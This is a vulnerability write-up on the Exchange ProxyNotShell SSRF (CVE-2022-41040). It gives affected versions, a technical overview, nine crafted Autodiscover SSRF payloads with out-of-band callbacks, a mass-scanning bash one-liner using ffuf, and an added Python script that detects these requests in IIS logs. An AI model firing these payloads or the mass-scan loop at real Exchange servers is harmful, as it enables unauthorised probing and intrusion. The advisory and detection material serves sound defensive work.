Server Side Request Forgery (SSRF) in Microsoft Exchange Server

CVE-2022-41040 (ProxyNotShell)

Details:

CVE-2022-41040 affects:

  • Microsoft Exchange Server 2013 Cumulative Update 23
  • Microsoft Exchange Server 2016 Cumulative Update 22
  • Microsoft Exchange Server 2019 Cumulative Update 11
  • Microsoft Exchange Server 2019 Cumulative Update 12
  • Microsoft Exchange Server 2016 Cumulative Update 23

The first vulnerability in the ProxyNotShell exploitation chain is CVE-2022-41040, a Server-Side Request Forgery (SSRF) vulnerability in the Exchange Autodiscover frontend that does not require authentication. It carries a CVSS score of 8.8 (High). Attackers exploit it by sending a crafted request, containing an attacker-controlled URI and body, that the frontend forwards to a backend service running with LocalSystem privilege.

What is ProxyNotShell

ProxyNotShell is not a single bug but a pair of vulnerabilities that are chained together to take control of Microsoft Exchange email servers: a Server-Side Request Forgery (SSRF) and a Remote Code Execution (RCE). The SSRF vulnerability allows an attacker who is already in the system to trigger the RCE vulnerability, and the RCE vulnerability allows the attacker to execute commands on the server. The SSRF is CVE-2022-41040 and the RCE is CVE-2022-41082.

On November 8, 2022, Microsoft released updates to fix these vulnerabilities, and it is recommended that organizations update their Exchange Servers to the latest version to protect their systems.

Technical analysis

In the first phase of the attack, the attacker leverages CVE-2022-41040, an unauthenticated Server-Side Request Forgery vulnerability in the Exchange Autodiscover frontend. Exploiting it gives the attacker access to the privileged PowerShell endpoint of the Exchange Server API (https://%exchange server domain%/powershell), using valid credentials for a registered account.

Once the attacker has access to the PowerShell API endpoint, they can execute PowerShell commands in the Exchange environment on the server machine by passing them in the payload via the XML Simple Object Access Protocol (SOAP).

In the next phase, the attacker aims to reach Web-Based Enterprise Management (WBEM) through the WS-Management protocol. To do so, the attacker opens a shell on the vulnerable system over Windows Remote Management (PowerShell remoting, PsRemoting) for further PowerShell script execution. This gives the attacker remote access to run arbitrary commands and potentially fully compromise the targeted Exchange Server.

Exploitation (CVE-2022-41040)

Manual

Replace COLLABHERE with your OOB domain:

sed 's/COLLABHERE/<oob-domain>/g'

Append the payloads to the URLs you want to test:

echo http://target.com | unfurl format %s://%d/<payload>

Payloads:

/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell

Visit the crafted URLs and check your collaborator for callbacks.
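For defenders, the request shapes shown in the technical analysis and in the payload list above are straightforward to spot in IIS logs: an Autodiscover JSON request whose path or parameter names carry an "@" redirect to a foreign host, or whose Email parameter holds a nested autodiscover.json path instead of an address, with Protocol=Powershell marking the pivot to the backend PowerShell endpoint. The following Python script is an added example (not code from this page or its author) that parses IIS W3C extended log lines and classifies each request. The log lines, IP addresses and the oob.example host are constructed placeholders; the field list and the two-tier classification are the script's own assumptions, not a vendor rule.

```python
"""Flag CVE-2022-41040 (ProxyNotShell SSRF) request shapes in IIS W3C logs.

Added defender-side example; not code from the original page. All sample
log lines below are constructed, with placeholder IPs and host names.
"""
from urllib.parse import parse_qsl, unquote

# Constructed IIS log excerpt (field order taken from the #Fields header line).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-10-01 10:00:01 10.0.0.5 GET /autodiscover/autodiscover.json/v1.0/aa@198.51.100.7.v2.oob.example/owa/ Protocol=Autodiscoverv1 443 - 203.0.113.9 curl/7.85.0 200
2022-10-01 10:00:02 10.0.0.5 GET /autodiscover/autodiscover.json Email=autodiscover/autodiscover.json%3fa@198.51.100.7&Protocol=Autodiscoverv1&Protocol=Powershell 443 - 203.0.113.9 curl/7.85.0 200
2022-10-01 10:00:03 10.0.0.5 GET /autodiscover/autodiscover.json Email=alice@example.com&Protocol=ActiveSync 443 DOMAIN\\alice 192.0.2.20 Outlook/16.0 200
2022-10-01 10:00:04 10.0.0.5 GET /owa/ - 443 DOMAIN\\bob 192.0.2.21 Mozilla/5.0 200
2022-10-01 10:00:05 10.0.0.5 GET /autodiscover/autodiscover.json %40target.v1.oob.example/&Email=autodiscover/autodiscover.json%3f%40target.v1.oob.example 443 - 203.0.113.9 python-requests/2.28 404
"""


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than mis-assign columns
        yield dict(zip(fields, values))


def classify(stem, query):
    """Return 'chain', 'ssrf-probe' or None for a single logged request.

    'ssrf-probe': the CVE-2022-41040 shape (an '@'-redirected Autodiscover path,
    an '@' smuggled into a parameter name, or a nested path in the Email value).
    'chain': the same shape plus Protocol=Powershell, i.e. the ProxyNotShell
    pivot toward the backend PowerShell endpoint.
    """
    path = unquote(stem).lower()
    if "autodiscover.json" not in path:
        return None
    # A normal Autodiscover v2 URL ends at autodiscover.json; an '@' after it
    # re-points the backend request at an attacker-chosen host.
    suspicious = "@" in path.split("autodiscover.json", 1)[1]
    powershell = False
    params = parse_qsl(query if query != "-" else "", keep_blank_values=True)
    for key, value in params:
        k, v = key.lower(), value.lower()
        if "@" in k:  # host name used as a parameter *name*, never legitimate
            suspicious = True
        if k == "email" and ("/" in v or "?" in v):  # an address has neither
            suspicious = True
        if k.endswith("protocol") and "powershell" in v:
            powershell = True
    if not suspicious:
        return None
    return "chain" if powershell else "ssrf-probe"


def find_suspicious(log_text):
    """Return (client_ip, verdict, uri_stem) for every flagged request."""
    hits = []
    for row in parse_iis_log(log_text):
        verdict = classify(row["cs-uri-stem"], row["cs-uri-query"])
        if verdict:
            hits.append((row["c-ip"], verdict, row["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for ip, verdict, stem in find_suspicious(SAMPLE_LOG):
        print(f"{verdict:<10} {ip:<15} {stem}")
```

The legitimate Outlook request on the third line (Email=alice@example.com) contains an "@" but is not flagged, because the classifier only treats "@" as a redirect when it appears in the path after autodiscover.json or in a parameter name; matching on "@" alone would drown real Autodiscover traffic in false positives.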

Mass exploitation

Simple bash one-liner which uses unfurl and ffuf.

for url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt | sed 's/COLLABHERE/<OOB-PAYLOAD>/g'); do cat targets.txt | unfurl format "$url" >> fuzz-ready.txt; done && ffuf -w fuzz-ready.txt -u FUZZ

Please use it wisely. Scan targets you have permission to. Shift Security Consulting is not responsible for any damage.